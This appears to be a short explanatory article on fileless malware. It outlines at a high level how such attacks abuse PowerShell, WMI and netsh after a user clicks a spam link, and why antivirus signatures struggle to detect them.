Like many types of malware attacks, this threat can arise from a simple click of a link from an unsuspecting end user. The difference here though, is just how difficult it is to spot an infection.
You may have heard of ‘fileless malware’ under a different term - be it a “zero-footprint” or “non-malware” attack. But don’t be fooled, these two nicknames are practically misnomers, as a fileless attack often relies on a user downloading malicious attachment files, while leaving small traces on the computer which can be extremely discrete.
Fileless Malware: How it works
Before we delve into just how big of a threat fireless malware is, here’s a quick look at a step-by-step example of how cyber criminals use the technique:
Step 1: A user receives a typical spam email containing a link to a malicious website
Step 2: The unsuspecting user clicks the link
Step 3: They’re directed to the malicious website, which then loads Flash on their computer
Step 4: Flash, well-known for having vulnerabilities, opens Windows PowerShell (which can execute instructions through the command line while operating in memory)
Step 5: PowerShell downloads and executes a script from a command-and-control server
Step 6: The PowerShell script locates and sends the user’s data to the attacker
This technique leverages an operating system's built-in tools and capabilities to execute the malicious activity. The most common instances of fileless attacks are the abuse of Microsoft’s WMI and Powershell.
Why is it so difficult to detect?
Without a payload file to infect a system, antivirus software applications can't generate a signature definition based on the malware file's characteristics. This poses a problem, as the application simply does not know what to look for.
Adding to its detection difficulties is the fact that fileless malware uses the system's own commands to execute the attack. For instance, using the netsh command to create a network connection, assign it a static IP address, and configure it to use a specific proxy IP address is a perfectly normal, built-in function of the Windows command.
But if a script runs on a computer that performs that function without a user's knowledge, the newly created network connection could be used as a means to exfiltrate data from that system to another remote connection across the internet, all while having its traffic hidden from view through a proxy.